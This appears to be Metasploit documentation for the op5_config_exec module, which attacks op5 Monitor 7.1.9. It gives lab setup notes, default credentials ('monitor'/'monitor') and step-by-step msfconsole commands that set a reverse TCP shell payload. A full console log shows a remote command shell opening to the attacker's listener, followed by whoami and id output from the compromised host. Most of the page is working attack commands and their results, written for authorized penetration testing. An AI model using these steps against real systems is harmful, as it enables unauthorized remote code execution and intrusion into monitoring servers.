2.2 KiB
2.2 KiB
Vulnerable Application
Official Source: op5.com Archived Copy: github
Creating A Testing Environment
Just a few quick notes on setting up a vulnerable lab with this software.
- The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
- Within
php.ini,date.timezone = "America/New York"todate.timezone = "America/New_York"if you get php errors - You may need to register for a free license via an email challenge/verification
Verification Steps
- Install the software, RHEL/CENTOS required (tested on CentOS 6)
- Start msfconsole
- Do:
use exploit/linux/http/op5_config_exec - Do:
set payload linux/x86/shell/reverse_tcp - Do:
set rhost 192.168.2.31 - Do:
set lhost 192.168.2.229 - Do:
exploit - You should get a shell.
Options
PASSWORD
Password is 'monitor' by default.
USERNAME
Documentation was unclear on this. Installing just the app, the username was 'monitor' by default. However it looks like if you install the appliance it may be 'root'
Scenarios
msf > use exploit/linux/http/op5_config_exec
msf exploit(op5_config_exec) > set verbose true
verbose => true
msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(op5_config_exec) > set rhost 192.168.2.31
rhost => 192.168.2.31
msf exploit(op5_config_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(op5_config_exec) > check
[+] Version Detected: 7.1.9
[+] The target is vulnerable.
msf exploit(op5_config_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending stage (36 bytes) to 192.168.2.31
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
[*] Command Stager progress - 100.00% done (832/832 bytes)
whoami
monitor
id
uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0